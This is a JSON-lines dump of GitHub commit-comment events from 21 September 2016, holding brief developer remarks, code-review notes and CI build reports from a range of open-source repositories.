{"id":"4593989346","type":"CommitCommentEvent","actor":{"login":"mandjou"},"repo":{"name":"mandjou/Spring-Config-Server"},"payload":{"comment":{"id":19107967,"position":null,"line":null,"path":null,"commit_id":"d74842973a1eebd6fff5131577fe17a4dadb83b7","created_at":"2016-09-21T04:24:08Z","updated_at":"2016-09-21T04:24:08Z","body":"spring.data.mongodb.database=ServerDatabase2\r\nspring.data.mongodb.host=localhost \r\nspring.data.mongodb.port=27017 \r\n"}},"created_at":"2016-09-21T04:24:08Z"}
{"id":"4593991097","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19107975,"position":null,"line":null,"path":null,"commit_id":"1104fed4b79aa638e86559fe5093b9075347d9e6","created_at":"2016-09-21T04:24:53Z","updated_at":"2016-09-21T04:24:53Z","body":"@snicolet Doing the dc-moves first is a very nice idea IMO. What I not understand is, why you also simplify the pinners-code. I'm sure you speed-tested the simpl. but recently it figured out that speed tests are not that reliable at all.\r\nIf the simpl. gives an advantage and the test passes, one could argue that the new idea got illegal help by a mod. that has nothing  to do with the new idea. However in the case that the simpl. hurts you might not pass the test because of this and it would be a pity...\r\n"}},"created_at":"2016-09-21T04:24:53Z"}
{"id":"4593991638","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"Mr9esx/ASWQL"},"payload":{"comment":{"id":19107977,"position":null,"line":null,"path":null,"commit_id":"d66aef550519a4335c6d7bd24495f4187f4c578d","created_at":"2016-09-21T04:25:07Z","updated_at":"2016-09-21T04:25:07Z","body":"![](yongjie917)"}},"created_at":"2016-09-21T04:25:07Z"}
{"id":"4593991754","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19107978,"position":980,"line":980,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T04:25:10Z","updated_at":"2016-09-21T04:25:10Z","body":"get_speakerでエラーとなるパターンはself.speakerがNoneとなる場合であり、\r\n`'BGPSpeaker could not be found'`\r\nというメッセージを出力しますが、レスポンスのステータスコードは404ではないのでしょうか？\r\njson.dumpsのエラーと捉えれば500で問題はないと思いますが。"}},"created_at":"2016-09-21T04:25:10Z"}
{"id":"4593992267","type":"CommitCommentEvent","actor":{"login":"andrewda"},"repo":{"name":"FRCTools/Attendance-Client"},"payload":{"comment":{"id":19107982,"position":null,"line":null,"path":null,"commit_id":"89a697104d40828190b544335d9e5ee73b0cd069","created_at":"2016-09-21T04:25:24Z","updated_at":"2016-09-21T04:25:24Z","body":":+1:"}},"created_at":"2016-09-21T04:25:24Z"}
{"id":"4594000503","type":"CommitCommentEvent","actor":{"login":"khuey"},"repo":{"name":"mozilla/rr"},"payload":{"comment":{"id":19108007,"position":15,"line":24,"path":"src/MmappedFileMonitor.cc","commit_id":"539c64c3861bf49c468faccf2467a0ab3db80f16","created_at":"2016-09-21T04:29:06Z","updated_at":"2016-09-21T04:29:06Z","body":"`std::shared_ptr` is not implicitly convertible to `bool`.  This is common for well-designed C++ smart pointer classes.\r\n\r\nIt is negatable though. The `!!` idiom  follows from that. Not sure how common that is, we used to use it in Gecko a lot which is where I picked it up."}},"created_at":"2016-09-21T04:29:06Z"}
{"id":"4594001178","type":"CommitCommentEvent","actor":{"login":"iamed18"},"repo":{"name":"McDermott-Group/servers"},"payload":{"comment":{"id":19108009,"position":null,"line":null,"path":null,"commit_id":"0d999aee26f4e4a4d83c28338bdaca0ed99e8661","created_at":"2016-09-21T04:29:22Z","updated_at":"2016-09-21T04:29:22Z","body":"Yeah the only things code-wise that needed to change were those that referenced the idea of the VNA having more than two ports (because the 5320 is four port and the 5242 is only two port). Other than that, the command literature is essentially identical, so the servers should be relatively easy to merge."}},"created_at":"2016-09-21T04:29:22Z"}
{"id":"4594002849","type":"CommitCommentEvent","actor":{"login":"ifansatyahudaya"},"repo":{"name":"ifansatyahudaya/tag_project"},"payload":{"comment":{"id":19108013,"position":4,"line":31,"path":"app/views/user_management/index.html.erb","commit_id":"9b74b6685b2e24704dcd550c331621764c3bd79e","created_at":"2016-09-21T04:30:08Z","updated_at":"2016-09-21T04:30:08Z","body":"adding path"}},"created_at":"2016-09-21T04:30:08Z"}
{"id":"4594004937","type":"CommitCommentEvent","actor":{"login":"vishal001"},"repo":{"name":"vishal001/abc"},"payload":{"comment":{"id":19108020,"position":null,"line":null,"path":null,"commit_id":"845491a532a46c543f5e858627269f8523343a9b","created_at":"2016-09-21T04:31:00Z","updated_at":"2016-09-21T04:31:00Z","body":"I love walking in the rain"}},"created_at":"2016-09-21T04:31:00Z"}
{"id":"4594006674","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19108023,"position":null,"line":null,"path":null,"commit_id":"714daaf5706e9e2b196beb5446cc4f53d1652c75","created_at":"2016-09-21T04:31:47Z","updated_at":"2016-09-21T04:31:47Z","body":"@MarcelRaad,\r\n\r\nThis broke us fairly badly on ARM devices. We'll be backing it out.\r\n\r\nI should have left well enough alone a year ago when I moved to remove Clang's `-DCRYPTOPP_DISABLE_ASM` restriction. The first sign of trouble was 6 bugs due to trouble with their integrated assembler. It takes up a disproportionate amount of my time....\r\n\r\n```\r\n```"}},"created_at":"2016-09-21T04:31:47Z"}
{"id":"4594008438","type":"CommitCommentEvent","actor":{"login":"mattbasta"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108030,"position":3,"line":3,"path":"templates/jinja2/dashboard/dashboard.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:32:30Z","updated_at":"2016-09-21T04:32:30Z","body":"This is the first page any signed-in person lands on. I was going to write some clever jinja code to make it suffix all of the titles but thought better of it. Again, there will be a second pass"}},"created_at":"2016-09-21T04:32:30Z"}
{"id":"4594009208","type":"CommitCommentEvent","actor":{"login":"mattbasta"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108034,"position":3,"line":3,"path":"templates/jinja2/dashboard/podcast/page_delete.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:32:52Z","updated_at":"2016-09-21T04:32:52Z","body":"All of these pages are going to be overhauled in the coming month or so"}},"created_at":"2016-09-21T04:32:52Z"}
{"id":"4594009701","type":"CommitCommentEvent","actor":{"login":"mattbasta"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108038,"position":3,"line":3,"path":"templates/jinja2/dashboard/sites/page_delete.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:33:06Z","updated_at":"2016-09-21T04:33:06Z","body":"it's really exciting"}},"created_at":"2016-09-21T04:33:06Z"}
{"id":"4594011060","type":"CommitCommentEvent","actor":{"login":"mattbasta"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108040,"position":3,"line":3,"path":"templates/jinja2/payments/tip_jar/base.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:33:40Z","updated_at":"2016-09-21T04:33:40Z","body":"Most of the visitors to this page are on mobile and won't see the title anyway"}},"created_at":"2016-09-21T04:33:40Z"}
{"id":"4594012769","type":"CommitCommentEvent","actor":{"login":"mattbasta"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108045,"position":7,"line":7,"path":"templates/jinja2/signup/main.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:34:26Z","updated_at":"2016-09-21T04:34:26Z","body":"Why do you think? ;D"}},"created_at":"2016-09-21T04:34:26Z"}
{"id":"4594014090","type":"CommitCommentEvent","actor":{"login":"sm-k"},"repo":{"name":"SickRage/SickRage"},"payload":{"comment":{"id":19108052,"position":null,"line":null,"path":null,"commit_id":"a30221af86a6bccc59a8a7b9e88d64c395c573bc","created_at":"2016-09-21T04:35:04Z","updated_at":"2016-09-21T04:35:04Z","body":"great work - thanks for this"}},"created_at":"2016-09-21T04:35:04Z"}
{"id":"4594014530","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":19108055,"position":null,"line":null,"path":null,"commit_id":"62df6deb2006d6399a5a3418fd15af25277c8b75","created_at":"2016-09-21T04:35:15Z","updated_at":"2016-09-21T04:35:15Z","body":"So shall we as well? I guess there are still some devices running it out there?"}},"created_at":"2016-09-21T04:35:15Z"}
{"id":"4594021613","type":"CommitCommentEvent","actor":{"login":"tomwangzhi"},"repo":{"name":"tomwangzhi/23"},"payload":{"comment":{"id":19108071,"position":null,"line":null,"path":null,"commit_id":"83b034ebbecd1f1cb17a6ffdfc3ba7edc0183c42","created_at":"2016-09-21T04:38:21Z","updated_at":"2016-09-21T04:38:21Z","body":"34"}},"created_at":"2016-09-21T04:38:21Z"}
{"id":"4594022766","type":"CommitCommentEvent","actor":{"login":"alanmcgovern"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19108078,"position":100,"line":132,"path":"main/src/addins/MonoDevelop.PackageManagement/MonoDevelop.PackageManagement/PackageManagementProjectOperations.cs","commit_id":"f9775303496729c96a3e661ea6572790f507fe78","created_at":"2016-09-21T04:38:52Z","updated_at":"2016-09-21T04:38:52Z","body":"This is deadlocking all the time for me. I've been trying to create a PCL based Xamarin Forms app and it deadlocks on this .Result every time. :("}},"created_at":"2016-09-21T04:38:52Z"}
{"id":"4594023672","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"rtaykowski/fewd-final-project"},"payload":{"comment":{"id":19108081,"position":4,"line":3,"path":"js/index.js","commit_id":"4f02560f962efdc94542c85cfd363f638777e478","created_at":"2016-09-21T04:39:16Z","updated_at":"2016-09-21T04:39:16Z","body":"Try reverting this to how you had it originally:\r\n\r\n```\r\n$(\"nav .hero-links\").toggleClass(\"open\"); \r\n```"}},"created_at":"2016-09-21T04:39:16Z"}
{"id":"4594028135","type":"CommitCommentEvent","actor":{"login":"amuntner"},"repo":{"name":"fuzzdb-project/fuzzdb"},"payload":{"comment":{"id":19108089,"position":null,"line":null,"path":null,"commit_id":"051ac4eb1b1f0e9b2699be46f3207d29cab46648","created_at":"2016-09-21T04:41:16Z","updated_at":"2016-09-21T04:41:16Z","body":"Thanks @todb-r7\r\n\r\nhttps://github.com/rapid7/metasploit-framework/commit/bd405277d935f142fb1d00612d44e5c0ef54a829"}},"created_at":"2016-09-21T04:41:16Z"}
{"id":"4594028547","type":"CommitCommentEvent","actor":{"login":"parasyte"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":19108092,"position":null,"line":null,"path":null,"commit_id":"62df6deb2006d6399a5a3418fd15af25277c8b75","created_at":"2016-09-21T04:41:28Z","updated_at":"2016-09-21T04:41:28Z","body":"Yep, IE11 is a little bit better, but realistically, only Edge is getting any love these days."}},"created_at":"2016-09-21T04:41:28Z"}
{"id":"4594028668","type":"CommitCommentEvent","actor":{"login":"JamesTeague"},"repo":{"name":"JamesTeague/fantasy-football-io"},"payload":{"comment":{"id":19108094,"position":null,"line":null,"path":null,"commit_id":"bd1bfa5954242f6cb2914dc4e2f817a3d83e9d23","created_at":"2016-09-21T04:41:31Z","updated_at":"2016-09-21T04:41:31Z","body":"We should look into possibly using an RSS feed for NFL News for ESPN, this may be a more stable long term solution/addition when comparing to scraping data from the webpage itself. I don't know that they have a Fantasy Football RSS feed though. It is worth the research, for all sites."}},"created_at":"2016-09-21T04:41:31Z"}
{"id":"4594028738","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"rtaykowski/fewd-final-project"},"payload":{"comment":{"id":19108095,"position":20,"line":29,"path":"lander.html","commit_id":"dcbaa8eac49f093da2050bbccf638bf11ad616ed","created_at":"2016-09-21T04:41:33Z","updated_at":"2016-09-21T04:41:33Z","body":"Try bringing the logo outside of the `<nav>` so it's parent is the `<header>`\r\n\r\n"}},"created_at":"2016-09-21T04:41:33Z"}
{"id":"4594033392","type":"CommitCommentEvent","actor":{"login":"duck-rh"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":19108102,"position":33,"line":33,"path":"lib/ansible/inventory/yaml.py","commit_id":"1942cd33dc3506b13b89bed871e43f7df7344a0d","created_at":"2016-09-21T04:43:32Z","updated_at":"2016-09-21T04:43:32Z","body":"s/INI/YAML/"}},"created_at":"2016-09-21T04:43:32Z"}
{"id":"4594034573","type":"CommitCommentEvent","actor":{"login":"oleg-alexandrov"},"repo":{"name":"NeoGeographyToolkit/BinaryBuilder"},"payload":{"comment":{"id":19108103,"position":null,"line":null,"path":null,"commit_id":"fb776bb457dbfb7e0b4ac1a0bd58a85248f06227","created_at":"2016-09-21T04:44:05Z","updated_at":"2016-09-21T04:44:05Z","body":"But xz was not added to build.py, so this code won't be reached. \r\n"}},"created_at":"2016-09-21T04:44:05Z"}
{"id":"4594034713","type":"CommitCommentEvent","actor":{"login":"JPeterson0"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":19108104,"position":null,"line":null,"path":null,"commit_id":"7d0e356e7ab4d37ecb9e514ed45731367215078e","created_at":"2016-09-21T04:44:09Z","updated_at":"2016-09-21T04:44:09Z","body":"I thought the quiz that linked to this gist stated that there would be a TODO item in this code?"}},"created_at":"2016-09-21T04:44:09Z"}
{"id":"4594036248","type":"CommitCommentEvent","actor":{"login":"foi"},"repo":{"name":"paddor/cztop"},"payload":{"comment":{"id":19108107,"position":null,"line":null,"path":null,"commit_id":"381da38e45673debb5714be1134085eae8b1b1fa","created_at":"2016-09-21T04:44:50Z","updated_at":"2016-09-21T04:44:50Z","body":"good news!"}},"created_at":"2016-09-21T04:44:50Z"}
{"id":"4594038195","type":"CommitCommentEvent","actor":{"login":"NatashaTheRobot"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19108108,"position":null,"line":null,"path":null,"commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T04:45:38Z","updated_at":"2016-09-21T04:45:38Z","body":"Sure.... but I only did the minimum to get my app working while waiting for a Swift 3.0 official release. Didn't do a PR of this b/c the tests won't work. "}},"created_at":"2016-09-21T04:45:38Z"}
{"id":"4594041285","type":"CommitCommentEvent","actor":{"login":"NatashaTheRobot"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19108114,"position":19,"line":15,"path":"Sources/NSCalendar+Timepiece.swift","commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T04:46:56Z","updated_at":"2016-09-21T04:46:56Z","body":"Sorry - but this is the best fix I found. I don't use this method in my app, so the point for me was to just get it compiling. I would ask the library author."}},"created_at":"2016-09-21T04:46:56Z"}
{"id":"4594041423","type":"CommitCommentEvent","actor":{"login":"remyoudompheng"},"repo":{"name":"remyoudompheng/polyglossia"},"payload":{"comment":{"id":19108115,"position":null,"line":null,"path":null,"commit_id":"6a4818fda9a77f02359115d764ef0968f3249b49","created_at":"2016-09-21T04:47:00Z","updated_at":"2016-09-21T04:47:00Z","body":"This is an extremely old change. Also I am not the contributor of polyglossia :\r\nplease refer to https://github.com/reutenauer/polyglossia\r\nI am going to destroy this repository."}},"created_at":"2016-09-21T04:47:00Z"}
{"id":"4594044399","type":"CommitCommentEvent","actor":{"login":"NatashaTheRobot"},"repo":{"name":"NatashaTheRobot/Timepiece"},"payload":{"comment":{"id":19108117,"position":36,"line":34,"path":"Sources/NSCalendarUnit+Timepiece.swift","commit_id":"515fe4b2bac80e6bc41bb805fe807403e76ead75","created_at":"2016-09-21T04:48:12Z","updated_at":"2016-09-21T04:48:12Z","body":"Yeah - yours looks better! I think this is just what the converter did for me, so I didn't put any thought into it. "}},"created_at":"2016-09-21T04:48:12Z"}
{"id":"4594045466","type":"CommitCommentEvent","actor":{"login":"obiot"},"repo":{"name":"melonjs/melonJS"},"payload":{"comment":{"id":19108118,"position":null,"line":null,"path":null,"commit_id":"62df6deb2006d6399a5a3418fd15af25277c8b75","created_at":"2016-09-21T04:48:39Z","updated_at":"2016-09-21T04:48:39Z","body":"@agmcleod as i think you are the only one with a windows device here (i mean beside a computer/laptop), do you also agree it can be removed ?"}},"created_at":"2016-09-21T04:48:39Z"}
{"id":"4594046943","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19108119,"position":18,"line":184,"path":"engines/fullpipe/stateloader.cpp","commit_id":"cf4452388cc4104072801b2a0c74bdef03d419d5","created_at":"2016-09-21T04:49:19Z","updated_at":"2016-09-21T04:49:19Z","body":"Thanks, that worked."}},"created_at":"2016-09-21T04:49:19Z"}
{"id":"4594047173","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108120,"position":null,"line":null,"path":null,"commit_id":"be9842e63edfaf0be084c204ed93a3a3c8efec0d","created_at":"2016-09-21T04:49:25Z","updated_at":"2016-09-21T04:49:25Z","body":"so close but so far - thanks, regardless 👍 "}},"created_at":"2016-09-21T04:49:25Z"}
{"id":"4594048248","type":"CommitCommentEvent","actor":{"login":"simon-kyger"},"repo":{"name":"simon-kyger/Game"},"payload":{"comment":{"id":19108123,"position":54,"line":137,"path":"Game/Client/index.html","commit_id":"43d8438fe6a7a0d2251f506516d44fc20449353d","created_at":"2016-09-21T04:49:55Z","updated_at":"2016-09-21T04:49:55Z","body":"an unfortunate bug that took me like an hour to fix"}},"created_at":"2016-09-21T04:49:55Z"}
{"id":"4594050692","type":"CommitCommentEvent","actor":{"login":"darkjav"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19108129,"position":10,"line":10,"path":"data/creaturescripts/scripts/others/playerdeath.lua","commit_id":"f684c0160aca624570baa1496174270403aca5d4","created_at":"2016-09-21T04:50:56Z","updated_at":"2016-09-21T04:50:56Z","body":"in the database not exist the table: znote_guild_wars\r\nyou can check?"}},"created_at":"2016-09-21T04:50:56Z"}
{"id":"4594051975","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"Pinecast/pinecast"},"payload":{"comment":{"id":19108131,"position":7,"line":7,"path":"templates/jinja2/signup/main.html","commit_id":"b926826ca4856c0ff3675401866bea18729b5814","created_at":"2016-09-21T04:51:27Z","updated_at":"2016-09-21T04:51:27Z","body":"because you're hijacking it?"}},"created_at":"2016-09-21T04:51:27Z"}
{"id":"4594052236","type":"CommitCommentEvent","actor":{"login":"joakime"},"repo":{"name":"eclipse/jetty.project"},"payload":{"comment":{"id":19108132,"position":16,"line":74,"path":"jetty-gcloud/jetty-gcloud-session-manager/src/main/java/org/eclipse/jetty/gcloud/session/GCloudSessionDataStore.java","commit_id":"60aeca1632e97c32b068857afd0f14de7e290dae","created_at":"2016-09-21T04:51:33Z","updated_at":"2016-09-21T04:51:33Z","body":"This variable is still being used by the testcases.  The 9.4.x and master builds are currently broken."}},"created_at":"2016-09-21T04:51:33Z"}
{"id":"4594058275","type":"CommitCommentEvent","actor":{"login":"danielgindi"},"repo":{"name":"danielgindi/Charts"},"payload":{"comment":{"id":19108148,"position":null,"line":null,"path":null,"commit_id":"95ea820c3a56980161e091852f988b8056ee6ba0","created_at":"2016-09-21T04:54:15Z","updated_at":"2016-09-21T04:54:15Z","body":"I didn't get why \"#if NEEDS_CHARTS\"? Is there a configuration where `ChartsRealm` could compile without knowing or needing `Charts`? :-)"}},"created_at":"2016-09-21T04:54:15Z"}
{"id":"4594058669","type":"CommitCommentEvent","actor":{"login":"Leithem"},"repo":{"name":"Leithem/testt"},"payload":{"comment":{"id":19108150,"position":null,"line":null,"path":null,"commit_id":"0595401b178526cb003b7e64a9cb89faabcc157c","created_at":"2016-09-21T04:54:27Z","updated_at":"2016-09-21T04:54:27Z","body":"miii"}},"created_at":"2016-09-21T04:54:27Z"}
{"id":"4594059394","type":"CommitCommentEvent","actor":{"login":"johnmw"},"repo":{"name":"kriasoft/react-static-boilerplate"},"payload":{"comment":{"id":19108152,"position":null,"line":null,"path":null,"commit_id":"cbfe71cbd50f08f614eedfca60933db5d8adb78f","created_at":"2016-09-21T04:54:46Z","updated_at":"2016-09-21T04:54:46Z","body":"Hi, when I start on a fresh project I get the following error:\r\n\r\nERROR in ./core/router.js\r\nModule build failed: SyntaxError: \"url\" is read-only\r\n\r\nI'm using node 6.5.0. \r\n\r\nCheers."}},"created_at":"2016-09-21T04:54:46Z"}
{"id":"4594059704","type":"CommitCommentEvent","actor":{"login":"Leithem"},"repo":{"name":"Leithem/testt"},"payload":{"comment":{"id":19108154,"position":null,"line":null,"path":null,"commit_id":"0595401b178526cb003b7e64a9cb89faabcc157c","created_at":"2016-09-21T04:54:54Z","updated_at":"2016-09-21T04:54:54Z","body":"sadasd"}},"created_at":"2016-09-21T04:54:54Z"}
{"id":"4594059730","type":"CommitCommentEvent","actor":{"login":"roguesyko"},"repo":{"name":"BrokenROM/vendor_broken"},"payload":{"comment":{"id":19108155,"position":null,"line":null,"path":null,"commit_id":"1bb8c33b6f34964e850ee04e87b05e2bad281a8b","created_at":"2016-09-21T04:54:55Z","updated_at":"2016-09-21T04:54:55Z","body":"Should be called Junk"}},"created_at":"2016-09-21T04:54:55Z"}
{"id":"4594063352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108158,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T04:56:31Z","updated_at":"2016-09-21T04:56:31Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2373 of 2373 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T04:56:31Z"}
{"id":"4594066243","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108163,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T04:57:46Z","updated_at":"2016-09-21T04:57:46Z","body":"ReplaceEPLaunchLite (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (2338 of 2339 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T04:57:46Z"}
{"id":"4594067591","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"Mr9esx/ASWQL"},"payload":{"comment":{"id":19108164,"position":null,"line":null,"path":null,"commit_id":"d66aef550519a4335c6d7bd24495f4187f4c578d","created_at":"2016-09-21T04:58:26Z","updated_at":"2016-09-21T04:58:26Z","body":"[http](codepen.io/jieke008/post/jieke008/)"}},"created_at":"2016-09-21T04:58:26Z"}
{"id":"4594069321","type":"CommitCommentEvent","actor":{"login":"adnanaziz"},"repo":{"name":"panda-34/epibook.github.io"},"payload":{"comment":{"id":19108169,"position":31,"line":31,"path":"solutions/python/binary_search_ai=i.py","commit_id":"4ae009e51255b8e8cbefb151b0e9c76d4519f8c1","created_at":"2016-09-21T04:59:10Z","updated_at":"2016-09-21T04:59:10Z","body":"testing a comment"}},"created_at":"2016-09-21T04:59:10Z"}
{"id":"4594070137","type":"CommitCommentEvent","actor":{"login":"2ion"},"repo":{"name":"BunsenLabs/bunsen-pipemenus"},"payload":{"comment":{"id":19108171,"position":null,"line":null,"path":null,"commit_id":"64133dd99db0542dbbc4f739b7003a78af2ea477","created_at":"2016-09-21T04:59:31Z","updated_at":"2016-09-21T04:59:31Z","body":"> That was a comment I made on a commit you had made (in a different repository)!\r\n\r\nI almost never read all of my notifications so I'm sorry that this escaped my attention.\r\n\r\nAnyhow. I still think it doesn't bring much benefit to remove the executable bit however I don't mind leaving the bit removed. This is not a grave issue that cries out for action after all."}},"created_at":"2016-09-21T04:59:31Z"}
{"id":"4594070717","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19108176,"position":null,"line":null,"path":null,"commit_id":"7b7b833e592c0366daf0559abec805dfa14c6e1f","created_at":"2016-09-21T04:59:47Z","updated_at":"2016-09-21T04:59:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HQBF1SBM&#x2F;86-in-game-collision-box-editor\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> In-Game Collision-box Editor</a>"}},"created_at":"2016-09-21T04:59:47Z"}
{"id":"4594072237","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19108179,"position":null,"line":null,"path":null,"commit_id":"303197203d9cb1642089f54b6263dd29eba6a897","created_at":"2016-09-21T05:00:18Z","updated_at":"2016-09-21T05:00:18Z","body":"GetInternalVariableBug (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-303197203d9cb1642089f54b6263dd29eba6a897-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T05:00:18Z"}
{"id":"4594072446","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/screeps"},"payload":{"comment":{"id":19108180,"position":null,"line":null,"path":null,"commit_id":"fba0d4885b262b2cf67f7d33fd3078c04e2d9f5d","created_at":"2016-09-21T05:00:23Z","updated_at":"2016-09-21T05:00:23Z","body":"Note that @1a37cac4544eec4e5e4d4aa24720858626b4aa35 was reverted, I excluded it when solving the merge conflict. It was cute, but the functionality was not really helpful."}},"created_at":"2016-09-21T05:00:23Z"}
{"id":"4594072854","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"yongjie917/ASWQL"},"payload":{"comment":{"id":19108184,"position":null,"line":null,"path":null,"commit_id":"d66aef550519a4335c6d7bd24495f4187f4c578d","created_at":"2016-09-21T05:00:34Z","updated_at":"2016-09-21T05:00:34Z","body":"codepen.io/jieke008/post/jieke008"}},"created_at":"2016-09-21T05:00:34Z"}
{"id":"4594075624","type":"CommitCommentEvent","actor":{"login":"petester42"},"repo":{"name":"danielgindi/Charts"},"payload":{"comment":{"id":19108186,"position":null,"line":null,"path":null,"commit_id":"95ea820c3a56980161e091852f988b8056ee6ba0","created_at":"2016-09-21T05:01:43Z","updated_at":"2016-09-21T05:01:43Z","body":"Cocoapods doesn't need to have `import Charts` that is why that compiler flag is there. I dont know why that pushed to master, it was a mistake. Hopefully #1509 explains why the change was made better."}},"created_at":"2016-09-21T05:01:43Z"}
{"id":"4594082784","type":"CommitCommentEvent","actor":{"login":"yamaplay-tckm"},"repo":{"name":"yamaplay-tckm/FirstProject"},"payload":{"comment":{"id":19108191,"position":1,"line":1,"path":"README","commit_id":"9915c96d9d076975b185b8477da1c5e265dc00e5","created_at":"2016-09-21T05:04:19Z","updated_at":"2016-09-21T05:04:19Z","body":"test comment"}},"created_at":"2016-09-21T05:04:19Z"}
{"id":"4594084832","type":"CommitCommentEvent","actor":{"login":"mebjas"},"repo":{"name":"pksunkara/octonode"},"payload":{"comment":{"id":19108199,"position":null,"line":null,"path":null,"commit_id":"4827e5fa56f11b254725665e0e0269bb0db16098","created_at":"2016-09-21T05:05:13Z","updated_at":"2016-09-21T05:05:13Z","body":"What happened?"}},"created_at":"2016-09-21T05:05:13Z"}
